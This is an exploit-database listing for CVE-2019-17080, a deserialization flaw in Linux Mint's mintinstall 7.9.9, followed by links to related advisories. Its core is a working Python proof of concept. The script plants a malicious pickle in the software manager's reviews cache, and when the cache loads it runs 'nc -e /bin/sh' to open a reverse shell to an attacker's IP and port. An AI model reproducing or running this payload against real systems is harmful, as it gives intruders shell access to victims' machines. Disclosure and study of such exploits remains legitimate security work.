Lucene search
AndhrimnirrPACKETSTORM:154722HistoryOct 02, 2019 - 12:00 a.m.
mintinstall 7.9.9 Code Execution
2019-10-0200:00:00
Andhrimnirr
packetstormsecurity.com
141
EPSS
0.003
Percentile
72.0%
`# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080
import os
import sys
def shellCode(payload):
with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
wb.write(payload)
print("[+] Start mintinstall")
if __name__=="__main__":
shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
print("[!] exploit.py [IP] [PORT]")
`
Related
exploitdb
exploitdb
mintinstall 7.9.9 - Code Execution
2019-10-03 00:00:00
cvelist
cvelist
CVE-2019-17080
2019-10-02 12:17:42
nvd
nvd
CVE-2019-17080
2019-10-02 13:15:11
cve
cve
CVE-2019-17080
2019-10-02 13:15:11
githubexploit
githubexploit
Exploit for Deserialization of Untrusted Data in Linuxmint Mintinstall
2019-10-02 08:26:34
Exploit for Deserialization of Untrusted Data in Linuxmint Mintinstall
2019-10-18 18:52:17
zdt
zdt
mintinstall 7.9.9 - Code Execution Exploit
2019-10-04 00:00:00
exploitpack
exploitpack
mintinstall 7.9.9 - Code Execution
2019-10-03 00:00:00
prion
prion
Code injection
2019-10-02 13:15:00